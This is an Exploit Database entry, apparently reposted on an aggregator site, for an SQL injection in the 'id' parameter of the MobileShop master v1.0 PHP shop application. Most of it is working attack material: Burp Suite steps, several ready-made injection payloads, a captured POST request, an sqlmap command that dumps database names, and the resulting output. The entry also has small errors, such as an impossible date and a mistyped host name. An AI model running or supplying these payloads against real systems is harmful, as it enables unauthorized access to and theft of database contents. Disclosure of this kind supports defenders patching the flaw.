MobileShop master v1.0 – SQL Injection Vuln.

• Exploit Database
• 59 阅读

• 作者： HAZIM ARBAŞ
  日期： 2024-03-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51921/

• + Exploit Title: MobileShop master v1.0 - SQL Injection Vuln.
  + Date: 2024-13-03
  + Exploit Author: "HAZIM ARBAŞ" from EMA Security LTD - Siber Güvenlik ve Bilişim Hizmetleri (https://emasecurity.com)
  + Vendor Homepage: https://code-projects.org/mobile-shop-in-php-css-javascript-and-mysql-free-download/
  + Software Link: https://download-media.code-projects.org/2020/04/Mobile_Shop_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip
  + Tested on: Windows 10 Pro
  + CWE: CWE-89
  + CVSS: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  + Type: WebApps
  + Platform: PHP
  
  ## References:
  + https://cwe.mitre.org/data/definitions/89.html
  + https://owasp.org/Top10/A03_2021-Injection/
  
  ## Description:
  The MobileShop-master application is susceptible to SQL Injection through the 'id' parameter in "/MobileShop-master/Details.php". Exploiting this vulnerability could lead to severe consequences, including unauthorized access, data manipulation, and potential exploitation of other vulnerabilities within the underlying database. It is imperative to address this issue promptly to mitigate the risk of compromise and ensure the security and integrity of the application and its data.
  
  ## Proof of Concept:
  + Go to the Login page: "http://localhost/MobileShop-master/Login.html"
  + Fill email and password.
  + Select any product and intercept the request via Burp Suite, then send it to Repeater.
  + Change the 'id' value to any of the below payloads.
  + Send the request
  
  ## Payloads:
  + id=1' AND 9071=9071 AND 'EtdU'='EtdU
  + id=1' AND (SELECT 7012 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(7012=7012,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wwwk'='wwwk
  + id=1' UNION ALL SELECT NULL,CONCAT(0x7176787071,0x7867535464594a544c58796246766f6a444c4358426b596c71724b59676455644b66794858734670,0x7171717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
  + Or you can write your own payloads
  
  
  ## Proof of Concept Using SqlMap:
  + Go to the Login page: "http://localhormst/MobileShop-master/Login.html"
  + Fill email and password.
  + Select any product and intercept the request via Burp Suite, then send it to Repeater.
  + Copy to File the request to a "sql.txt" file.
  + Run the following sqlmap command
  + sqlmap -r sql.txt -p id --dbs
  
  
  ```
  POST /MobileShop-master/Details.php HTTP/1.1
  Host: localhost
  Content-Length: 42
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  Origin: http://localhost
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Referer: http://localhost/MobileShop-master/MobilesList.php
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
  Cookie: PHPSESSID=mh3mnpf51bj2q17hg8sipbltnn
  Connection: close
  
  id=1
  ```
  
  + Use sqlmap to exploit. In sqlmap, use 'id' parameter to dump the database.
  ```
  sqlmap -r sql.txt -p id --dbs
  ```
  
  ```
  ---
  Parameter: id (POST)
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: id=1' AND 9071=9071 AND 'EtdU'='EtdU
  
  Type: error-based
  Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  Payload: id=1' AND (SELECT 7012 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(7012=7012,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wwwk'='wwwk
  
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: id=1' AND (SELECT 7380 FROM (SELECT(SLEEP(5)))rlmI) AND 'blrN'='blrN
  
  Type: UNION query
  Title: Generic UNION query (NULL) - 13 columns
  Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7176787071,0x7867535464594a544c58796246766f6a444c4358426b596c71724b59676455644b66794858734670,0x7171717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
  ---
  [04:17:04] [INFO] the back-end DBMS is MySQL
  web application technology: PHP 8.2.12, Apache 2.4.58
  back-end DBMS: MySQL >= 5.0 (MariaDB fork)
  [04:17:04] [INFO] fetching database names
  [04:17:05] [INFO] resumed: 'information_schema'
  [04:17:05] [INFO] resumed: '1'
  [04:17:05] [INFO] resumed: '3'
  [04:17:05] [INFO] resumed: 'admidio'
  [04:17:05] [INFO] resumed: 'calender'
  [04:17:05] [INFO] resumed: 'corregidor'
  [04:17:05] [INFO] resumed: 'gym'
  [04:17:05] [INFO] resumed: 'joomla_db'
  [04:17:05] [INFO] resumed: 'linkstack'
  [04:17:05] [INFO] resumed: 'mobileshop'
  [04:17:05] [INFO] resumed: 'mysql'
  [04:17:05] [INFO] resumed: 'nickey'
  [04:17:05] [INFO] resumed: 'performance_schema'
  [04:17:05] [INFO] resumed: 'phpmyadmin'
  [04:17:05] [INFO] resumed: 'rcms'
  [04:17:05] [INFO] resumed: 'smith'
  [04:17:05] [INFO] resumed: 'telephone'
  [04:17:05] [INFO] resumed: 'test'
  [04:17:05] [INFO] resumed: 'valente'
  
  ```